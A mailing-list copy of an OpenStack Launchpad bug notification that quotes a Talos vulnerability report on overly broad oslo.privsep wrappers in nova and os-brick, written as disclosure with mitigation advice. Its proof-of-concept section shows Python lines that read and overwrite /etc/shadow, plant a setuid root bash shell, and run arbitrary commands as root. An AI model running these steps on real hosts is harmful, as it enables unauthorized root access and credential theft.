yahoo-eng-team team mailing list archive

Thread
Date
[Bug 1989008] Re: Lax rulesets leading to privilege escalation vulnerabilities

To: yahoo-eng-team@xxxxxxxxxxxxxxxxxxx
From: Jeremy Stanley <1989008@xxxxxxxxxxxxxxxxxx>
Date: Wed, 29 Mar 2023 16:39:16 -0000
Reply-to: Bug 1989008 <1989008@xxxxxxxxxxxxxxxxxx>
Sender: noreply@xxxxxxxxxxxxx
I missed setting the security advisory task to won't fix state when we
decided on this as a security hardening opportunity, so have done so now
(as it won't have any advisory issued).

** Changed in: ossa
       Status: Incomplete => Won't Fix

-- 
You received this bug notification because you are a member of Yahoo!
Engineering Team, which is subscribed to OpenStack Compute (nova).
https://bugs.launchpad.net/bugs/1989008

Title:
  Lax rulesets leading to privilege escalation vulnerabilities

Status in OpenStack Compute (nova):
  Triaged
Status in os-brick:
  New
Status in oslo.privsep:
  Triaged
Status in OpenStack Security Advisory:
  Won't Fix

Bug description:
  [OpenStack's vulnerability managers received the following report via
  encrypted E-mail]

  ### Summary

  A privilege escalation vulnerability exists in the oslo.privsep
  functionality of OpenStack git master 05194e7618 and prior. Overly
  permissive functionality within tools leveraging this library within a
  container can lead increased privileges.

  ### Confirmed Vulnerable Versions

  The versions below were either tested or verified to be vulnerable by
  Talos or confirmed to be vulnerable by the vendor.

  OpenStack git master 05194e7618

  ### Product URLs

  OpenStack -
  [https://opendev.org/openstack/](https://opendev.org/openstack/)

  ### CVSSv3 Score

  8.8 - CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

  ### CWE

  CWE-269 - Improper Privilege Management

  ### Details

  OpenStack contains a number of tools, libraries, and services for
  providing simplified, powerful, and scalable cloud based applications.

  OpenStack's [oslo.privsep](https://opendev.org/openstack/oslo.privsep)
  library "helps applications perform actions which require more or less
  privileges ... in a safe, easy to code and easy to use manner." An
  entry in sudoers is generally added to bootstrap oslo.privsep with the
  correct privileges when run from an unprivileged user such as `nova`.

  The oslo.privsep [design
  documents](https://docs.openstack.org/oslo.privsep/latest/user/index.html)
  state the following:

      Privileged functions must be as simple, specialized and narrow as possible, so as to prevent further escalation. In this example,
      update_motd(message) is narrow: it only allows the service to overwrite the MOTD file. If a more generic update_file(filename, content) was created,
      it could be used to overwrite any file in the filesystem, allowing easy escalation to root rights. That would defeat the whole purpose of oslo.privsep.
      ...
      Provided the unprivileged<->privileged boundary contains any hole that effectively grants root to the caller, then there is little benefit to having the separation [provided by privsep]

  Two modules were observed to have functions that were overly broad and
  allowed for trivial escalation to root. The `nova`
  [module](https://opendev.org/openstack/nova/blob/master/nova/privsep/path.py)
  contains privileged wrappers for `chmod`, `chown`, `rmdir`, and
  arbitrary file create/write/move/read. Second, the os_brick
  [module](https://opendev.org/openstack/os-
  brick/blob/master/os_brick/privileged/rootwrap.py) contains functions
  to execute arbitrary shell commands as root. The source file contains
  the following comment from 2016:

      Just in case it wasn't clear, this is a massive security back-door. [these wrappers] allow any command to be run as the privileged user (default "root").
      This is intended only as an expedient transition and should be removed ASAP.

  Either of the above modules are sufficient to achieve privilege
  escalation to root. Other modules within OpenStack were not audited,
  but it is possible that similar issues exist elsewhere in the
  codebase.

  ### Crash Information

  ###### Method 1 (nova)

      from nova.privsep.path import *
      from oslo_config.cfg import CONF
      CONF.privsep_context = 'nova.privsep.sys_admin_pctxt'
      # Read /etc/shadow
      last_bytes("/etc/shadow", 1000)
      # Write to /etc/shadow
      writefile("/etc/shadow", "wb", b"<payload_here>")
      # Get a root shell
      os.system("cp /bin/bash /tmp/bash")
      chown("/tmp/bash", 0)
      chmod("/tmp/bash", 0o4755)
      os.system("/tmp/bash -p")
      bash-5.1#

  ###### Method 2 (os_brick)

      from os_brick.privileged.rootwrap import *
      from oslo_config.cfg import CONF
      import shlex # helpful for multi-arg commands
      CONF.privsep_context = 'os_brick.privileged.default'
      execute_root(*shlex.split("id"))
      ('uid=0(root) gid=0(root) groups=0(root)\n', '')

  ### Mitigation

  Privileged functions in the `nova` and `os_brick` modules of OpenStack
  should be rewritten to be as specialized and narrowly tailored as
  possible; e.g. `chmod(path, mode)` should be replaced with a function
  that only applies pre-defined permissions on one or more pre-defined
  files.

  Suggest auditing other modules that use oslo.privsep to identify
  similar issues.

  ### Credit

     Keane O&#39;Kelley of Cisco ASIG

  https://talosintelligence.com/vulnerability_reports/

To manage notifications about this bug go to:
https://bugs.launchpad.net/nova/+bug/1989008/+subscriptions